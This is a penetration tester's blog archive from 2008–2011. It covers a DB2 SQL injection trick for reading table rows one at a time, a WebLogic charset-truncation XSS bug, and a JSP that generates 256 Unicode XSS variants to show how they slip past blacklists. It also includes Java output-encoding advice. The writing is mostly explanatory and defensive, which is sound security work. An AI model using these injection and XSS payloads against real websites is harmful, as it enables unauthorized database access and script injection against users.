Confessions of a Penetration Tester

2011-09-13

DB2 SQL Injection : Select the Nth row without cursors

Well I've looked all over the net for this solution and I could not find the answer so after much trial an error I was able to build my own solution. Lets say you need to query one row at a time from DB2 and you cannot use cursors and specifically you need to query sysibm.systables. I came up with this solution and there may be a more elegant way but this worked.

select * from (
        select * from systables order by name asc fetch first 1 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 2 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 3 rows only
) as G order by name desc fetch first 1 rows only

...

...

select * from (
        select * from systables order by name asc fetch first 1000 rows only
) as G order by name desc fetch first 1 rows only

I put the below query into a vulnerable parameter sent to a website and used burp intruder to iterate through each row by incrementing N.

select * from (
select * from systables order by name asc fetch first N rows only
) as G order by name desc fetch first 1 rows only

The query works by first requesting N number of rows with the data ordered ascending and thus putting the Nth row on the bottom of the Result Set. Next query the Result Set ordered desc so that the Nth row is now at the top of the Result Set and fetch the first row. The Result Set will then return the Nth row you need without having to define cursors.

2011-04-28

Hacking 101 with Tracer-T

This makes me laugh every time I watch it. I still cannot figure out if the kid is joking or serious.

2011-03-27

Roku hidden features.

I finally bought a Roku device today and immediately went looking for development resources. I was surprised to find they have and SDK you can download for free and you don’t need to pay anything to distribute your app as long as your distributing it for free. You can easily put your device into ‘Development Mode’ and this Development mode lets you upload code directly to the device though an HTTP interface and also enables a telnet port for which you can step through/debug the code. I think it’s great that you have the option to run the code locally on your own device or create a private channel so that only a select few can see it, or make it public (i.e. every one in the world). I’m still new into this but i can’t help but wonder what their app review process is like to ensure malware-like apps are not being distributed but i’ll get more into that at a later date.

All of this is cool and I can’t wait to make my own channel but the other really cool trick it can do is act as a network sniffer! It has the option to enable tcpdump that will cycle through up to 4 dump files. These are all available via its web interface. This could be fun just to leave running for a few days to see what turns up.

Be forewarned, there doesn’t seem to be any security around this stuff once its enabled though. No password is required to access any of these features once they are enabled but you must use the remote to enable them. Its like putting in the cheat codes to old Nintendo games. UP,UP,DN,DN, Left,Right,Left,Right, B,A….

The channel code is written in BrightScript which is completely new to me. It looks alot, well exactly, like VB Script. I have never been a big fan of languages that don’t end lines in semi-colons. Probably because I started learning programming in C. I was actually kinda expecting sometime more java like. That was more wishfully thinking on my part I guess.

Since its got tcpdump built into it lets see if i can port RADAR over to it. :P

2011-03-25

Hack Like in the Movies… with RADAR

I have just started a new (possibly open source) project/experiment to perform 3D modeling of network traffic and networking events in near realtime. My idea was to give the users the freedom of movement similar to a First Person Shooter (WASD controls) and the ability to better visualize how attacks interact with the network. Some things are just more apparent when you have a different view.

Introducing RADAR

RADAR is written in Java using openGL so that it should be easy to port to any system. It has a built in network sniffer and currently only nmap integration. It currently listens to network traffic and will animate information about all devices it finds on the network including open ports, whois, HTTP request/responses, etc. When complete it will have the ability to record, playback, pause, rewind, and slow down these events in the animation.
RADAR represents all IP devices as 3d orbs and places them in rings that somewhat represent subnets but basically anything that matches the first two octets goes into a ring group at this point (may be better later on). All orbs can be clicked to display detailed information about what’s communicating with the host. It displays a parsed out view of the pcap data by row and when a row is selected a view of the actual hexdump is visible. This can better be explained by the video below.

Download Coming Soon…

Soon as I feel comfortable with it I will release a version that any of you out there can try out.

2008-12-17

WebLogic and Non-English Character Sets

I want to discuss more in depth about the vulnerability Matt Presson and I have been working on. Apparently if you have a Weblogic server and you accept international characters but you have the page encoding set to ISO 8859-1 then you are vulnerable to a whole mess of xss attacks and any script listed in my previous blog post will execute. What seems to happen, we are still trying to find the exact cause, is that the web server will truncate the upper bytes when returning the request. so if you entered 0x013C the response will contain 0x3C which is of course '<' and freakin vulnerable ;) This will get past the default output encoding that is done in <bean:write which uses the function ResponseUtils.filter() to actually do all of its output encoding. If your use StringEscapeUtils.escapeHtml() from apache commons lang then all your output will be encoded correctly and this is demonstrated by the war file Matt Presson released.

I also modified Matt's code so that the regular POST is also vulnerable. The ajax post was vulnerable because it called encodeURIComponent from javascript. If you set the form to accept-charset="UTF-8" then the data will be encoding the same as with encodeURIComponent.

   <form name="dataForm" id="form" method="POST" action="/International/execute/Display" accept-charset="UTF-8">

Below is a video of the the attack being exploited both in ajax and in a regular post.

I have currently tested this on tomcat and glassfish and was unable to get the same results so it seems to primarily be a weblogic issue.

I would like to thank Gareth Heyes for giving me a hacker tag in hackvertor to perform this expoit.!!!!

2008-10-23

Why not to use Blacklists.

I was looking at Matt Presson's Blog article about executing scripts with foreign char sets and decided to write my own JSP to generate every XSS that could be executed with foreign characters. This is a perfect example of why not to use blacklist. A simple whitelist or better proper output encoding (mentioned in my last post) will thwart these attempts.

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@page import="org.apache.commons.lang.StringEscapeUtils" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
for(long i=0; i< 0x100; i++)
{
    long lt = 0x3C;
    long gt = 0x3E;
    long order = i << 8;
    long LT = order | lt;
    //out.println(Long.toHexString(LT) + " : ");
    long GT = order | gt;
    //out.println(Long.toHexString(GT) + "<BR>");
    String theScript = (char)LT + "script" + (char)GT + "alert(" + i + ");" +(char)LT + "/script" + (char)GT;
    out.println( theScript + "<br>");
}

%>
</body>
</html>

This will generate 256 different versions of javascript to bypass blacklist input validation attempts. Here are a few examples. They may not display properly on this blog so i recommend running it on your own tomcat server.

ļscriptľalert(1);ļ/scriptľ
ȼscriptȾalert(2);ȼ/scriptȾ
̼script̾alert(3);̼/script̾
мscriptоalert(4);м/scriptо
ԼscriptԾalert(5);Լ/scriptԾ
ؼscriptؾalert(6);ؼ/scriptؾ
ܼscriptܾalert(7);ܼ/scriptܾ
࠼script࠾alert(8);࠼/script࠾
़scriptाalert(9);़/scriptा
਼scriptਾalert(10);਼/scriptਾ
଼scriptାalert(11);଼/scriptା
఼scriptాalert(12);఼/scriptా
഼scriptാalert(13);഼/scriptാ
฼script฾alert(14);฼/script฾
༼script༾alert(15);༼/script༾
ြscriptှalert(16);ြ/scriptှ
ᄼscriptᄾalert(17);ᄼ/scriptᄾ
ሼscriptሾalert(18);ሼ/scriptሾ
ጼscriptጾalert(19);ጼ/scriptጾ
ᐼscriptᐾalert(20);ᐼ/scriptᐾ
ᔼscriptᔾalert(21);ᔼ/scriptᔾ
ᘼscriptᘾalert(22);ᘼ/scriptᘾ
᜼script᜾alert(23);᜼/script᜾
ᠼscriptᠾalert(24);ᠼ/scriptᠾ
᤼script᤾alert(25);᤼/script᤾
ᨼscriptᨾalert(26);ᨼ/scriptᨾ
ᬼscriptᬾalert(27);ᬼ/scriptᬾ
᰼script᰾alert(28);᰼/script᰾
ᴼscriptᴾalert(29);ᴼ/scriptᴾ
ḼscriptḾalert(30);Ḽ/scriptḾ
ἼscriptἾalert(31);Ἴ/scriptἾ
‼script‾alert(32);‼/script‾
ℼscriptℾalert(33);ℼ/scriptℾ
∼script∾alert(34);∼/script∾

2008-10-20

What do you mean no Java output encoding !!!

I hear all the time that java does not have any good encoding libraries but have used some frameworks that do seem to encode the output properly. If anyone uses the struts framework and implements it properly then all your output is encoded properly if you use the following methods to output data.

<bean:write name="secData" property="username"/><br>
<html:link href="./test.jsp" paramId="test" paramName="secData" paramProperty="username" > <bean:write name="secData" property="username"/></html:link><br>
<html:hidden name="secData" property="username" /> <br>

The tag libraries bead:write, html:hidden, and html:link will all output either url encoded output for html:link (which creates an anchor tag) and html:hidden or will entity encode your output for bean:write.

What if your not using struts you ask?

Well this is great if you are using struts 1 and struts 2 (output tags are different for struts 2) but what you are not or you are writing servlets that generate html dynamically. This is not a problem. I dug a little deeper into struts to see what struts was doing and if there is a way to leverage this for other sites that do not use this framework. The URL encoding is simply URLEncode.encode( your string, your format). Its uses a default java class that has been around since 1.5. Just import java.net.URLEncoder.

Example:

String output = URLEncoder.encode("your String" , "UTF-8");

Struts 1 is using an entity encoder built specifically into the struts framework. The entity encoding is using a struts class called ResponseUtils. So you could import this class and still not use the struts MVC architecture.

Example:

String output = org.apache.struts.util.ResponseUtils.filter("your string");

Struts 2 does entity encoding by using a class TextUtils from WebWork. Import org.opensymphony.xwork2.util.TextUtils

Example:

String output = org.opensymphony.xwork2.util.TextUtils.htmlEncode("your string", true);

Proper Encoding with international Chars!!!!

There are other encoding options provided by the apache commons lang library. This is library is probably the most useful. To get it to properly encode international chars to the screen you need to first unescape the html before to escape the html. import org.apache.commons.lang.StringEscapeUtils;

Example:

String Output = StringEscapeUtils.escapeHtml(StringEscapeUtils.unescapeHtml(input));

Below is an example screenshot of the all above encodings in a simple servlet. Notice that StringEscapeUtils (the last one) will properly encode the xss attempt plus the Chinese character set. This will solve the problem all you java developers have with output encoding international characters and can quit complaining that there isn't any good encoding options for java. =) My source code is attached here: http://my-security-projects.googlecode.com/files/testEncoding.war

I hope this finally answers everyone's concerns for international character encoding in java. I'll let you all out there in the hacker community see if you can find a way to get past this model. Let me know if you do

Here is the page source:

<html><body>
<h1> Servlet Test </h1>
<br><b>Input String: </b> <script>alert('xss');</script> 环球经济不景
气中国经济增长放缓 中国经济
在环球不景气下呈现放缓态势
，最新国内生产总值增长为9.9%，
通胀持续放缓。 中国九月贸易
盈余创纪录 访谈：中国外贸前
景不容乐观 金融风暴：中国面
临的危机与机遇
<br>
<b>java.net.URLEncoded: </b>%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E+++
%26%2329615%3B%26%2329699%3B%26%2332463%3B%26%2327982%3B%26%2319981%3B%26%2326223%3B
%26%2327668%3B%26%2320013%3B%26%2322269%3B%26%2332463%3B%26%2327982%3B%26%2322686%3B
%26%2338271%3B%26%2325918%3B%26%2332531%3B+%26%2320013%3B%26%2322269%3B%26%2332463
%3B%26%2327982%3B%26%2322312%3B%26%2329615%3B%26%2329699%3B%26%2319981%3B%26%2326223
%3B%26%2327668%3B%26%2319979%3B%26%2321576%3B%26%2329616%3B%26%2325918%3B%26%2332531
%3B%26%2324577%3B%26%2321183%3B%26%2365292%3B%26%2326368%3B%26%2326032%3B%26%2322269
%3B%26%2320869%3B%26%2329983%3B%26%2320135%3B%26%2324635%3B%26%2320540%3B%26%2322686
%3B%26%2338271%3B%26%2320026%3B9.9%25%26%2365292%3B%26%2336890%3B%26%2332960%3B%26
%2325345%3B%26%2332493%3B%26%2325918%3B%26%2332531%3B%26%2312290%3B+%26%2320013%3B
%26%2322269%3B%26%2320061%3B%26%2326376%3B%26%2336152%3B%26%2326131%3B%26%2330408
%3B%26%2320313%3B%26%2321019%3B%26%2332426%3B%26%2324405%3B+%26%2335775%3B%26
%2335848%3B%26%2365306%3B%26%2320013%3B%26%2322269%3B%26%2322806%3B%26%2336152%3B%26
%2321069%3B%26%2326223%3B%26%2319981%3B%26%2323481%3B%26%2320048%3B%26%2335266%3B+
%26%2337329%3B%26%2334701%3B%26%2339118%3B%26%2326292%3B%26%2365306%3B%26%2320013%3B
%26%2322269%3B%26%2338754%3B%26%2320020%3B%26%2330340%3B%26%2321361%3B%26%2326426%3B
%26%2319982%3B%26%2326426%3B%26%2336935%3B+
<br>
<b>(apache commons lang) org.apache.commons.lang.StringEscapeUtils: </b><script>alert('xss');</script>
&#29615;&#29699;&#32463;&#27982;&#19981;&#26223;&#27668;&#20013;&#22269;&#32463;
&#27982;&#22686;&#38271;&#25918;&#32531; &#20013;&#22269;&#32463;&#27982;&#22312;
&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;&#25918;&#32531;
&#24577;&#21183;&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;
&#20540;&#22686;&#38271;&#20026;9.9%&#65292;&#36890;&#32960;&#25345;&#32493;&#25918;
&#32531;&#12290; &#20013;&#22269;&#20061;&#26376;&#36152;&#26131;&#30408;&#20313;
&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;&#36152;
&#21069;&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;
&#65306;&#20013;&#22269;&#38754;&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;
&#36935;
<br>
<b>(struts-core-1.3.8.jar) org.apache.struts.util.ResponseUtils: </b><script>alert('xss');</script>
&#29615;&#29699;&#32463;&#27982;&#19981;&#26223;&#27668;&#20013;&#22269;&#32463;
&#27982;&#22686;&#38271;&#25918;&#32531; &#20013;&#22269;&#32463;&#27982;&#22312;
&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;&#25918;&#32531;
&#24577;&#21183;&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;
&#20540;&#22686;&#38271;&#20026;9.9%&#65292;&#36890;&#32960;&#25345;&#32493;&#25918;
&#32531;&#12290; &#20013;&#22269;&#20061;&#26376;&#36152;&#26131;&#30408;&#20313;
&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;&#36152;
&#21069;&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;
&#65306;&#20013;&#22269;&#38754;&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;
&#36935;
<br>
<b>(xwork) com.opensymphony.xwork2.util.TextUtils with spec chars: </b><script>alert('xss');</script>
&#29615;&#29699;&#32463;&#27982;&#19981;&#26223;&#27668;&#20013;&#22269;&
#32463;&#27982;&#22686;&#38271;&#25918;&#32531; &#20013;&#22269;&#32463;&#27982;
&#22312;&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;&#25918;
&#32531;&#24577;&#21183;&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;
&#24635;&#20540;&#22686;&#38271;&#20026;9.9%&#65292;&#36890;&#32960;&#25345;&
#32493;&#25918;&#32531;&#12290; &#20013;&#22269;&#20061;&#26376;&#36152;&#26131;
&#30408;&#20313;&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&
#22269;&#22806;&#36152;&#21069;&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;
&#34701;&#39118;&#26292;&#65306;&#20013;&#22269;&#38754;&#20020;&#30340;&#21361;
&#26426;&#19982;&#26426;&#36935;
<br>
<b>apache commons unescape then escape with StringEscapeUtils: </b><script>alert('xss');</script>
环球经济不景气中国经济增长放
缓 中国经济在环球不景气下呈现
放缓态势，最新国内生产总值增
长为9.9%，通胀持续放缓。 中国九
月贸易盈余创纪录 访谈：中国外
贸前景不容乐观 金融风暴：中国
面临的危机与机遇
<br>
<form action="AscetikServlet" method="POST" >
<input type="text" id="input" name="input" >
<input type="submit" >
</form>
</body>
</html>

References:
Apache Commons Lang: http://commons.apache.org/lang/
Struts 1: http://struts.apache.org/
Struts 2: http://struts.apache.org/2.x/
WebWork: http://www.opensymphony.com/webwork/
Mycode: http://my-security-projects.googlecode.com/files/testEncoding.war
My code is written for tomcat 6 with java 1.6 and all the above libraries.